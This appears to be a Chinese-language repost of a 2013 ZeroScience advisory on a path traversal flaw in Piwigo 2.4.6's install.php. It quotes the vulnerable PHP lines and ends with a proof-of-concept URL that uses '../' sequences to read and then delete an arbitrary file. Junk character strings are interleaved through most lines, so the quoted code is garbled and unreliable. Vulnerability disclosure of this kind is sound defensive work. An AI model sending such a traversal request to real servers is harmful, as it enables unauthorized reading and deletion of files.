Piwigo是用PHP编写的相册脚本。
3 A/ T* c4 t4 P- O5 b6 ^0 C$ o& [& [9 s
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
3 r# o. O6 Z8 w/ a- M====================================================================$ K: _' Z; I7 \$ `$ ^9 j" I8 ^
/install.php:
( N# I6 t6 b# C% ~3 I; R% `" K! s-------------; Z- w1 `1 |! x: I& Z" v8 ~4 r
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
" J& C" u B; S114: {1 m5 I# g: ]6 i, b- M4 ~
115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];3 I Z1 E1 M) `; M& |6 @6 o
116: header('Cache-Control: no-cache, must-revalidate');- u, @* {' L7 ]7 N
117: header('Pragma: no-cache');
$ m$ _4 }$ h/ j; W118: header('Content-Disposition: attachment; filename="database.inc.php"');
; ?5 z; ?" b3 z0 ~: z119: header('Content-Transfer-Encoding: binary');
4 o- v& ^$ {4 D. r7 V. t) h120: header('Content-Length: '.filesize($filename));
! ?, k, m% o' W/ a121: echo file_get_contents($filename);
% O; a* g( G4 A7 ]- L Y; I122: unlink($filename);
@% K0 C" H% P# X E6 a123: exit();2 ]. t6 R6 M* j e$ P9 n
124: }" I: E, @6 v; w2 Z
====================================================================
) M8 N( P. A- u" \: M# _ ' \8 }" k4 J2 t' w( E+ n+ O
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
/ x1 M" G" N9 u9 _/ p Apache 2.4.2 (Win32) e$ c+ Z, v8 D0 @+ W p: l
PHP 5.4.4
6 i1 f' r1 z( ?2 v MySQL 5.5.25a
! s* H+ u4 y* K; r) ] p/ @3 }, ?* P
! y% u2 p/ v' {, X* E5 O* EVulnerability discovered by Gjoko 'LiquidWorm' Krstic' j* c1 @2 f1 j2 f. N; n
@zeroscience
- i% Z+ m) k+ H" u! ^$ T, Z
& r1 G4 z; ?) e* G* n7 E; ?6 fAdvisory ID: ZSL-2013-5127
0 u4 Q+ j4 i" ]Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
# a$ J% k' L2 s4 ? KVendor Patch: http://piwigo.org/bugs/view.php?id=2843
, c& {* `4 |4 X0 q' B' l- Q; Z 6 O0 n" j9 Q# n
15.02.2013. F' f4 F+ o" u) s2 }6 D- W
: S: C& d1 w( ?: | `5 s. m
--
' E, n+ t8 ~! T+ w# k [( u( i" `http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt* y" x. n. s$ {" N/ c
8 |% D" o3 f* B4 @1 u E3 D- t |